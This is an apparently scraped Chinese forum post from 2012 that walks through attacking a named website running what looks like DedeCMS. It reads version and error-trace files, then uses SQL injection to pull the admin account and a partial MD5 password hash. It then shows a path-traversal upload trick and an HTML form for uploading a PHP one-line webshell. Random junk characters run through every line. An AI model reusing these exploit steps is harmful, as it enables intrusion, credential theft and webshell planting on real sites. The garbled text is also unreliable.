①注入漏洞。1 i6 ?" W6 k) O
这站 http://www.political-security.com/ X9 ?8 k' H' H' v
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,% F9 L3 t9 ^* Y0 d) f2 N
www.political-security.com/data/mysql_error_trace.inc 爆后台+ U6 j4 c! h: U& g5 ?, B
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。! }( j- m* S* M
然后写上语句
; r0 l: A! @4 ~. I8 n/ X+ @" `查看管理员帐号$ D; V+ a: ^7 l2 y: X/ o
http://www.political-security.co ... &membergroup=@`
! ^& M! S5 R J
8 G! T( g) X, c' R4 J7 u) Eadmin
. f3 P0 _" R H0 y* O+ i9 w z! r, h
查看管理员密码. w! ~" a7 h+ g6 Z: `* p6 V
http://www.political-security.co ... &membergroup=@`. F" R0 e* M1 g
) }5 o; i5 h+ s4 g8d29b1ef9f8c5a5af429
+ X/ X( e5 W/ {' Y+ {0 d# V* G1 E: ~
查看管理员密码
2 a! @5 X0 m+ }3 q* X* n
5 [. r, G0 x' k6 T9 Z$ |- _& G9 [ i得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5$ u. l4 c& `2 d0 B7 d. L
7 d B1 `) M8 w' W8 t9 x
8d23 z [; J, g3 P. ~7 v
9b1ef9f8c5a5af42& p7 U: C# Q0 Y5 a }
9
8 B3 z& I) E- E* K8 ? g' U Q- H. a; u& M% u
cmd5没解出来 只好测试第二个方法
( C5 K% a: L/ o* `
- l) ]3 d) q8 _* f% y% B2 I$ x' @9 X+ e% B( q
②上传漏洞:) M0 R- y$ f4 j+ }7 I
- \7 K- f: \- _; {5 P' p) R
只要登陆会员中心,然后访问页面链接# R8 t$ U1 c4 B' a0 T
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
3 {8 U9 c- a& }6 M2 `. w) q
( h- \) f& n. j0 l( q如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”- H$ `! ~0 ?/ z! i+ @0 t: D$ f
E" {- o- m% b) o7 O于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm3 b' s4 o1 e. H3 V2 F9 ~2 K
* q, B" B6 i2 r" u) f h, W5 ~<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ {" a' `2 x% J! \% R) k2 K2 F6 c5 f) j或者( n; J# d7 Z+ g
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对